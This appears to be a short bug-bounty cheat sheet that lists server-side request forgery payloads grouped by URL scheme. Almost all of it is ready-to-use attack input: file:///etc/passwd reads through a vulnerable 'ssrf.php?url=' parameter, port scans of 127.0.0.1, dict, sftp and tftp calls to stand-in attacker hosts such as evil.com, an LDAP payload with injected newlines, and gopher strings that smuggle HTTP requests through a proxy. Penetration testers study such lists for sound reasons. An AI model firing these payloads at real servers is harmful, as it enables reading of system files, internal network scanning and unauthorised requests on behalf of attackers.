SSRF exploitation via URL Scheme
1-File:Allows an attacker to fetch the content of a file on the server
file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd
2-HTTP:Allows an attacker to fetch any content from the web,it can also be used to scan ports ssrf.php?url=http://127.0.0.1:22 ssrf.php?url=http://127.0.0.1:80 ssrf.php?url=http://127.0.0.1:443
3-Dict:DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol =dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> =ssrf.php?url=dict://attacker:11111/
4-SFTP:A network protocol used for secure file transfer over secure shell ssrf.php?url=sftp://evil.com:11111/ 5-TFTP:Trivial File Transfer Protocol, works over UDP ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
6-LDAP: It is an application protocol used over an IP network to manage and access the distributed directory information service ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
7-Gopher HTTP gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
3
#SSRF #exploitation #BugBounty
Leave a Reply